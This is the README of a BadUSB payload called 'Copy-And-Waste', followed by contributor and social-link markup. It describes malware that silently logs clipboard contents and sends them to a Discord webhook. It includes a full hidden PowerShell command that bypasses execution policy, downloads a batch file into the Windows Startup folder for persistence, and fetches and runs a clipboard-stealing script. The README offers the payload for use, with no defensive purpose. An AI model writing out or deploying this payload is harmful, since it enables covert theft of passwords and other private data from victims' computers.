BadUSB/Copy-And-Waste/README.md
A payload to exfiltrate clipboard contents
This payload uses iwr to download 2 files
I.bat is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
c.ps1 will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
All contributors names will be listed here:
<p align="right">(<a href="#top">back to top</a>)</p> </a>
YouTube </td> <td align="center" width="96"> <a href="https://twitter.com/atomiczsec">
</a>
Twitter </td> <td align="center" width="96"> <a href="https://discord.gg/MYYER2ZcJF">
</a>
I-Am-Jakoby's Discord </td>
</tr> </table> </div> <p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p> <!-- ACKNOWLEDGMENTS -->